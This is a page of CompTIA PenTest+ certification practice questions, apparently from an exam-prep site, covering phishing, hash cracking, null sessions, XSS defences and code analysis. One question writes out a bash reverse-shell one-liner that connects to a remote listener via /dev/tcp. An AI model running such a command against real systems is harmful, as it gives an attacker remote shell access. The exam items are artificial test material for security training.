CompTIA (PT0-001) Exam Questions And Answers page 13

A senior employee received a suspicious email from another executive requesting an urgent wire transfer. Which of the following types of attacks is likely occurring?
Attacks and Exploits
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
Information Gathering and Vulnerability Identification
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, it might be better for the tester to create the same environment on the VM. Which of the following is MOST important for confirmation?
Information Gathering and Vulnerability Identification, Penetration Testing Tools
A static code analysis report of a web application can be leveraged to identify:
Planning and Scoping, Information Gathering and Vulnerability Identification
A systems security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications?
Information Gathering and Vulnerability Identification
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
Attacks and Exploits, Penetration Testing Tools
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
Information Gathering and Vulnerability Identification, Attacks and Exploits
A tester identifies an XSS attack vector during a penetration test. Which of the following flags should the tester recommend to prevent a JavaScript payload from accessing the cookie?
Attacks and Exploits, Penetration Testing Tools
A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?
Attacks and Exploits, Penetration Testing Tools
A tester was able to retrieve domain users' hashes. Which of the following tools can be used to uncover the users' passwords? (Choose two.)
Attacks and Exploits, Penetration Testing Tools